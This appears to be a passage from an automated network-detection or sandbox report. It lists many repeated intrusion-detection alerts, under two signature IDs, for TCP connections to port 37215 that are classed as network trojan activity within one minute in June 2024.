          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515580
          SID:2835222
          Source Port:40404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894227
          SID:2829579
          Source Port:59764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447187
          SID:2835222
          Source Port:38834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266602
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274440
          SID:2829579
          Source Port:48890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742829
          SID:2829579
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891555
          SID:2835222
          Source Port:46078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155562
          SID:2835222
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115777
          SID:2835222
          Source Port:48236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792918
          SID:2835222
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781793
          SID:2829579
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2829579
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732538
          SID:2835222
          Source Port:42702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509949
          SID:2829579
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260877
          SID:2829579
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131996
          SID:2835222
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799011
          SID:2829579
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792701
          SID:2835222
          Source Port:47708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444784
          SID:2829579
          Source Port:51116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730483
          SID:2829579
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352912
          SID:2829579
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176220
          SID:2829579
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.790002
          SID:2829579
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352856
          SID:2835222
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135437
          SID:2835222
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144904
          SID:2835222
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350769
          SID:2835222
          Source Port:52520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152968
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160476
          SID:2829579
          Source Port:39170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462902
          SID:2835222
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748056
          SID:2835222
          Source Port:46732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734859
          SID:2829579
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841747
          SID:2829579
          Source Port:55482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132673
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731365
          SID:2829579
          Source Port:35506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783187
          SID:2829579
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798028
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044919
          SID:2835222
          Source Port:38796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460759
          SID:2829579
          Source Port:52486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516588
          SID:2835222
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891663
          SID:2835222
          Source Port:42074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511149
          SID:2829579
          Source Port:54940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895635
          SID:2835222
          Source Port:39366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511624
          SID:2835222
          Source Port:34588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151227
          SID:2835222
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857867
          SID:2829579
          Source Port:42306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672732
          SID:2829579
          Source Port:59742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461276
          SID:2835222
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180528
          SID:2835222
          Source Port:44998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165978
          SID:2829579
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131742
          SID:2835222
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406975
          SID:2829579
          Source Port:57602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887201
          SID:2829579
          Source Port:43030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262473
          SID:2829579
          Source Port:34294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731887
          SID:2835222
          Source Port:39022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017638
          SID:2829579
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861105
          SID:2829579
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912292
          SID:2829579
          Source Port:60394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175870
          SID:2829579
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510565
          SID:2829579
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2829579
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035509
          SID:2829579
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551952
          SID:2829579
          Source Port:59944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705428
          SID:2829579
          Source Port:51456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273334
          SID:2829579
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108356
          SID:2829579
          Source Port:59438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157313
          SID:2829579
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263866
          SID:2829579
          Source Port:33848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239351
          SID:2835222
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354830
          SID:2835222
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402481
          SID:2829579
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599632
          SID:2835222
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059730
          SID:2829579
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394196
          SID:2829579
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600006
          SID:2835222
          Source Port:33498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463791
          SID:2835222
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780412
          SID:2829579
          Source Port:55226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894662
          SID:2829579
          Source Port:43582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188678
          SID:2829579
          Source Port:40594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463159
          SID:2829579
          Source Port:56156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126746
          SID:2829579
          Source Port:35236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603009
          SID:2835222
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734094
          SID:2829579
          Source Port:37034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176637
          SID:2829579
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241488
          SID:2835222
          Source Port:57812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548455
          SID:2835222
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126992
          SID:2835222
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604947
          SID:2835222
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811655
          SID:2835222
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858374
          SID:2835222
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783687
          SID:2829579
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554381
          SID:2829579
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552349
          SID:2835222
          Source Port:47982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797750
          SID:2835222
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731357
          SID:2835222
          Source Port:53140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857620
          SID:2829579
          Source Port:58976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705664
          SID:2829579
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378122
          SID:2835222
          Source Port:41074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741365
          SID:2835222
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602816
          SID:2835222
          Source Port:54872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822550
          SID:2835222
          Source Port:33724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128916
          SID:2829579
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859602
          SID:2829579
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169415
          SID:2829579
          Source Port:59354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238610
          SID:2829579
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353965
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2829579
          Source Port:54392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175935
          SID:2829579
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409931
          SID:2829579
          Source Port:37676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890463
          SID:2829579
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112262
          SID:2835222
          Source Port:40162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403600
          SID:2829579
          Source Port:41398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449662
          SID:2829579
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796344
          SID:2835222
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861815
          SID:2829579
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786774
          SID:2829579
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021868
          SID:2829579
          Source Port:59754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113764
          SID:2835222
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262326
          SID:2829579
          Source Port:37732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513777
          SID:2829579
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744311
          SID:2835222
          Source Port:55770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056441
          SID:2835222
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670304
          SID:2835222
          Source Port:47002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463011
          SID:2835222
          Source Port:33128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132128
          SID:2829579
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734627
          SID:2835222
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449569
          SID:2835222
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911374
          SID:2829579
          Source Port:55526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512281
          SID:2835222
          Source Port:47376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036319
          SID:2829579
          Source Port:34264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554622
          SID:2835222
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740798
          SID:2835222
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462649
          SID:2835222
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352121
          SID:2835222
          Source Port:40658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355759
          SID:2835222
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448498
          SID:2829579
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601403
          SID:2835222
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038150
          SID:2829579
          Source Port:41846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735026
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663755
          SID:2829579
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846733
          SID:2835222
          Source Port:47006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260672
          SID:2835222
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732650
          SID:2835222
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734746
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110033
          SID:2835222
          Source Port:34912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042327
          SID:2835222
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858003
          SID:2829579
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088025
          SID:2829579
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071091
          SID:2835222
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191842
          SID:2829579
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021423
          SID:2829579
          Source Port:59424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704498
          SID:2835222
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241134
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811518
          SID:2835222
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511686
          SID:2835222
          Source Port:42534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887678
          SID:2829579
          Source Port:38794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306382
          SID:2829579
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176100
          SID:2829579
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152856
          SID:2829579
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257711
          SID:2835222
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888166
          SID:2829579
          Source Port:53688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817068
          SID:2829579
          Source Port:46848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743151
          SID:2835222
          Source Port:49740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018892
          SID:2829579
          Source Port:59052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911439
          SID:2835222
          Source Port:47714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515800
          SID:2835222
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792617
          SID:2829579
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188707
          SID:2835222
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444367
          SID:2835222
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261045
          SID:2835222
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552085
          SID:2835222
          Source Port:49288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812650
          SID:2829579
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854287
          SID:2835222
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351176
          SID:2835222
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107789
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237951
          SID:2829579
          Source Port:42574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153711
          SID:2829579
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743369
          SID:2829579
          Source Port:39770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166002
          SID:2829579
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274148
          SID:2829579
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461094
          SID:2829579
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466942
          SID:2829579
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862477
          SID:2829579
          Source Port:35622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021096
          SID:2835222
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792679
          SID:2835222
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264709
          SID:2829579
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542784
          SID:2829579
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241706
          SID:2829579
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353688
          SID:2835222
          Source Port:40128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258028
          SID:2835222
          Source Port:53368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549219
          SID:2829579
          Source Port:49238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442100
          SID:2835222
          Source Port:48574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295054
          SID:2829579
          Source Port:33696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274631
          SID:2829579
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746178
          SID:2835222
          Source Port:34802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444620
          SID:2829579
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264167
          SID:2829579
          Source Port:45692
          Destination Port:37215
